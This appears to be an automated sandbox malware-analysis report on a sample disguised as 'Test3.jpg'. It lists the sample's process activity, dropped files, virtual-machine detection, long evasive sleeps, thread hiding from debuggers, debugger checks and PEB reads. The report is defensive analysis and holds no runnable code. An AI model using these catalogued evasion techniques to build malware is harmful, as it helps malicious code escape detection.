Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1 Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5429 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1580 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Window / User API: threadDelayed 2267 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Test1.txt Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\conhost.exe TID: 6928 Thread sleep count: 213 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048 Thread sleep count: 5429 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7076 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052 Thread sleep count: 1580 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7024 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5676 Thread sleep count: 2267 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784 Thread sleep count: 38 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784 Thread sleep time: -380000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5840 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192 Thread sleep count: 297 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread sleep count: Count: 2267 delay: -10 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError, 29_2_00426F7A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo, 29_2_0044A238
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterExtendedAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Connect-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterExtendedAcl
Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr Binary or memory string: Test-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterRdma
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr Binary or memory string: Rename-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterVlan
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: "Remove-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMScsiController
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VmNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMScsiController
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterRdma
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterVlan
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VmNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr Binary or memory string: Disconnect-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: "Remove-VMNetworkAdapterExtendedAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr Binary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMScsiController
Source: ModuleAnalysisCache.3.dr Binary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterExtendedAcl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000 29_2_00478772
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0058E501 IsDebuggerPresent,OutputDebugStringW, 29_2_0058E501
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 29_2_007D5210
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_004252D0 mov eax, dword ptr fs:[00000030h] 27_2_004252D0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424F75 mov eax, dword ptr fs:[00000030h] 27_2_00424F75
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FD2 mov eax, dword ptr fs:[00000030h] 27_2_00424FD2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FE7 mov eax, dword ptr fs:[00000030h] 27_2_00424FE7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FFB mov eax, dword ptr fs:[00000030h] 27_2_00424FFB
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022100C7 mov eax, dword ptr fs:[00000030h] 27_2_022100C7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02211133 mov ecx, dword ptr fs:[00000030h] 27_2_02211133
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C36 mov eax, dword ptr fs:[00000030h] 27_2_02210C36
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B3A mov eax, dword ptr fs:[00000030h] 27_2_02210B3A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
